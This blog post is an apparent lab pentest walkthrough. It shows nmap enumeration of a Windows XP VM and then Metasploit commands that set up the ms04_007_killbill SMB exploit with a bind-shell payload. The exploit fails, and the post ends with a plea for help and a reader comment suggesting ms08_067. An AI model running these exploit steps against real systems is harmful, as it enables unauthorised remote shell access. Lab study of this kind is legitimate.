To perform pentest some stage we have to do.
First we have to do information gathering and Service Enumeration first.
now we do IG and SE use enmap tool.
Scanning with the enmap Tool
type the command #nmap -T4 -A -v 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:8E:6C:39 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XPSP3, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:8e:6c:39 (Cadmus Computer Systems)
| Names
| XPSP3<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XPSP3<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: xpsp3
| NetBIOS computer name: XPSP3
| Workgroup: WORKGROUP
|_ System time: 2012-12-22 01:25:23 UTC+7
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.56.101
NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
Raw packets sent: 1106 (49.362KB) | Rcvd: 1017 (41.238KB)
Then we do Metasploit manually vulnerability
before we go into the directory root@bt:~# msfconsole 192.168.56.101
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15728 updated 134 days ago (2012.08.10)
Warning: This copy of the Metasploit Framework was last updated 134 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf >
then we seach smb, type the command
msf > search smb
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ----
Microsoft Workstation Service NetAddAlternateComputerName Overflow
exploit/windows/smb/ms04_007_killbill 2004-02-10 00:00:00 UTC low
Microsoft ASN.1 Library Bitstring Heap Overflow
exploit/windows/smb/ms04_011_lsass 2004-04-13 00:00:00 UTC good Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 00:00:00 UTC good Microsoft NetDDE Service Overflow
exploit/windows/smb/ms05_039_pnp 2005-08-09 00:00:00 UTC good Microsoft Plug and Play Service Overflow
exploit/windows/smb/ms06_025_rasmans_reg 2006-06-13 00:00:00 UTC good Microsoft RRAS Service RASMAN Registry Overflow
exploit/windows/smb/ms06_025_rras 2006-06-13 00:00:00 UTC average Microsoft RRAS Service Overflow
exploit/windows/smb/ms06_040_netapi 2006-08-08 00:00:00 UTC good Microsoft Server Service NetpwPathCanonicalize Overflow
exploit/windows/smb/ms06_066_nwapi 2006-11-14 00:00:00 UTC good Microsoft Services MS06-066 nwapi32.dll Module Exploit
exploit/windows/smb/ms06_066_nwwks 2006-11-14 00:00:00 UTC good Microsoft Services MS06-066 nwwks.dll Module Exploit
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 00:00:00 UTC manual Microsoft Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms07_029_msdns_zonename 2007-04-12 00:00:00 UTC manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 00:00:00 UTC good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
exploit/windows/smb/ms10_061_spoolss 2010-09-14 00:00:00 UTC excellent Microsoft Print Spooler Service Impersonation Vulnerability
exploit/windows/smb/netidentity_xtierrpcpipe 2009-04-06 00:00:00 UTC great
then select one of the smb modules that will be exploit. Type the command
msf > use exploit/windows/smb/ms04_007_killbill
then, type the command
msf exploit(ms04_007_killbill) > show options
Module options (exploit/windows/smb/ms04_007_killbill):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > show options
Module options (exploit/windows/smb/ms04_007_killbill):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms04_007_killbill) > set PAYLOAD windows/shell/bind_tcp
msf exploit(ms04_007_killbill) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms04_007_killbill) > show options
Module options (exploit/windows/smb/ms04_007_killbill):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 192.168.56.101 no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[-] Error: The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0)
Scanning With Nessus Tool
Then Type the Button Launch Scan
Sorry still error, please help further :-)
Hi, I'm using ms08_067_netapi
BalasHapushere: http://scx030c067.blogspot.com/2012/12/exploit-ms08-067-in-windows-xp.html